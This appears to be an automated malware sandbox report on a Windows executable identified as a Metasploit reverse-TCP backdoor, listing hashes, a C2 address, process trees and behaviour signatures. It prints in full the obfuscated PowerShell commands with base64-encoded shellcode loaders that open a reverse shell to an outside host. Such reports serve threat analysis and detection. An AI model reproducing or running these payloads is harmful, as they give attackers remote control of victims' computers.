metasploit | 60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e

General

Target

59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe
Size

132KB
MD5

59f770974597fa27ef9e484feaca9cda
SHA1

c402332adb19c3973a64214dc313feccd1c8671d
SHA256

60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e
SHA512

7f31239c49dab452ff288a284bb14e5b7158239a3344599ead533b8282c7408d976fd8fadb6729840859d514c955468e1134b92bdf09ba001d65297ae01341c4
SSDEEP

3072:42sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXcOuBXJ:hbJhs7QW69hd1MMdxPe9N9uA0hu9TBZR

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

18.189.106.45:13167

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe
2	2552	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2956 powershell.exe
2788 powershell.exe
2552 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2956 powershell.exe
Token: SeDebugPrivilege 2788 powershell.exe
Token: SeDebugPrivilege 2552 powershell.exe

pid	process
2956	powershell.exe
2788	powershell.exe
2552	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

59f770974597fa27ef9e484feaca9cda_JaffaCakes118.execmd.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2304 wrote to memory of 2848	2304	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe	cmd.exe
PID 2304 wrote to memory of 2848	2304	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe	cmd.exe
PID 2304 wrote to memory of 2848	2304	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe	cmd.exe
PID 2848 wrote to memory of 2956	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 2956	2848	cmd.exe	powershell.exe
PID 2848 wrote to memory of 2956	2848	cmd.exe	powershell.exe
PID 2956 wrote to memory of 2788	2956	powershell.exe	powershell.exe
PID 2956 wrote to memory of 2788	2956	powershell.exe	powershell.exe
PID 2956 wrote to memory of 2788	2956	powershell.exe	powershell.exe
PID 2788 wrote to memory of 2552	2788	powershell.exe	powershell.exe
PID 2788 wrote to memory of 2552	2788	powershell.exe	powershell.exe
PID 2788 wrote to memory of 2552	2788	powershell.exe	powershell.exe
PID 2788 wrote to memory of 2552	2788	powershell.exe	powershell.exe
PID 2552 wrote to memory of 2772	2552	powershell.exe	csc.exe
PID 2552 wrote to memory of 2772	2552	powershell.exe	csc.exe
PID 2552 wrote to memory of 2772	2552	powershell.exe	csc.exe
PID 2552 wrote to memory of 2772	2552	powershell.exe	csc.exe
PID 2772 wrote to memory of 2440	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2440	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2440	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2440	2772	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\2158.bat C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windows 1 -Command "sv h -;sv o ec;sv uCu ((gv h).value.toString()+(gv o).value.toString());powershell (gv uCu).value.toString() 'JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFIASgBGACkAKQA7ACQAUgBEAEMATQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAHcAaQBBACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAdwBpAEEAIAAkAFIARABDAE0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUgBEAEMATQAgACQAZQAiADsAfQA='"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkA